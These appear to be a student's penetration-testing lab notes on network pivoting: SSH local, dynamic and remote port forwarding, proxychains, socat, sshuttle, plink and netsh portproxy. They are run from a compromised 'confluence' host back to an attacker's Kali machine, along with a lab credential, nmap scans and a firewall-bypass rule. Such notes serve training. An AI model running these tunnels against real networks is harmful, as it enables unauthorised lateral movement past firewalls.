ssh

Local port forwarding

Local port forwarding

ssh -L 3306:localhost:3306 [email protected]

ssh -L 0.0.0.0:4242:172.16.191.217:4242 [email protected]

From conflunce se did ssh tunelling where 0.0.0.0 is local ip address of
confluence and we said to pgdatabase to tunnel this ips 172.16.191.217
445 port to confluence and then we can listen to the port 4455 on confl
uence
ssh -L localip:4455:3'rd_ip_inthelist:445 [email protected]

Dynamic port forwarding

Steps:
1.connect to confluence spwan tty shell
2.ssh -N -D 0.0.0.0:9999 [email protected] [This comma
nd allows all all the local interfaces and ip connected of the host 10.4.5
0.215 ]
3.tail /etc/proxychains4.conf
4.# socks5 192.168.50.63 9999 [write this in the last of the proxychain
ss file]
5.This ensures that all the trafic goes through this port on this ip so wit
h this we can send our data directly to 10.4.50.215 which will help us to
scan the ip connected to 10.4.50.215

Untitled 1
 6.But remember for it to work we have to give proxychains command b
efore the tools like smb or nmap
7.proxychains smbclient -L //172.16.50.217/ -U hr_admin --password=W
elcome1234
8.proxychains nmap -vvv -sT --top-ports=20 -Pn 172.16.50.217

Remote port forward

In this section we deal with the firewall as we can not connect to any other
dynmamic port on confluence1 bcs of the firewall configured hardware
based and software based.
So what we do is we connect to confluence with the cve and then remotly
forward port from inside of the confluence

ssh -N -R 127.0.0.1:2345:10.4.50.215:5432 [email protected]

ssh -N -R 127.0.0.1:5985:172.16.229.10:5985 [email protected]

ssh -N -R ip_to_forward_to_in_above_case_we_Forwarded_to_licalhost_
of_kali:2345:Which_ips_you_want_to_forward_like.which_are_connecte
d_to_confluencxe1:5432 kali@Your_kali_ip

Untitled 2
 Remote dynamic port forwarding

Here we just need -R switch to dynamically tunnel all the interfaces of c

onfluence1
ssh -N -R 9999 [email protected]

tail /etc/proxychains4.conf
socks5 127.0.0.1 9998 {Try socks4 if socks5 dosent work}

SSHuttel

socat TCP-LISTEN:2222,fork TCP:10.4.50.215:22 [This connects the pg

satabase to confluence1 means it tunnels 22 port of pgdatabase to conf
luence 2222]
sshuttle -r [email protected]:2222 10.4.50.0/24 172.16.5
0.0/24

Windows ssh tunnel

where ssh
ssh.exe -N -R 9999 [email protected]

Windows plink tunnel

Untitled 3
 Download the plink.exe to target machine
C:\Windows\Temp\plink.exe -ssh -l kali -pw <YOUR PASSWORD HERE>
-R 127.0.0.1:9833:127.0.0.1:3389 192.168.118.4

C:\Windows\Temp\plink.exe -ssh -l kali -pw <YOUR PASSWORD HERE>

-R 127.0.0.1:9833:127.0.0.1:3389 192.168.118.4 [This is the kali localport
and host] [This is target ip and port that we want to tunnel] [This is kal
i's ip]

Windows netsh

This should be run as administrator

netsh interface portproxy add v4tov4 listenport=2222 listenaddress=19
2.168.50.64 connectport=22 connectaddress=10.4.50.215
If the firewall is present then use this after the above command

netsh advfirewall firewall add rule name="port_forward_ssh_2222" prot

ocol=TCP dir=in localip=192.168.50.64 localport=2222 action=allow

Untitled 4